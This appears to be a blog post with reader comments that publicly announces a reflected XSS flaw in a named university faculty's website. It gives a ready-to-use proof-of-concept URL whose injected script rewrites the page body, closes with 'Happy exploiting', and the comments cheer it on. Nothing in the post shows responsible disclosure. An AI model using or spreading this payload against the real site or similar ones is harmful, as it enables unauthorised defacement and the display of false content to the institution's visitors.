Alexandrea University: Faculty of Commerce.. vulnerable to XSS

Hi again,

The Faculty of Commerce at Alexandrea university is found vulnerable to XSS attacks.

An attacker could easily lure the victim into clicking a malicious URL that could be used to display malicious or possibly incorrect content on the web page.

Although the form specifies POST requests instead of GET in the source-code, the ASP web page is coded to handle both, perhaps, with POST preferred over GET if provided.

PoC:

hxxp://www.alex-commerce.edu.eg/Result42.asp?fld1=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27body%27%29[0].innerHTML=%27%3Ch1%3EXSS%20Vulnerability%20-%20by%20Xacker%3C/h1%3E%27%3C/script%3E

Happy exploiting.

3 Responses to “Alexandrea University: Faculty of Commerce.. vulnerable to XSS”

  1. Wael Dalloul Says:

    😀, God help the universities untill someone graduated.

  2. HaHaHaHa
    Shame, I miss ’em already😄

  3. He will do it for sure😀

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: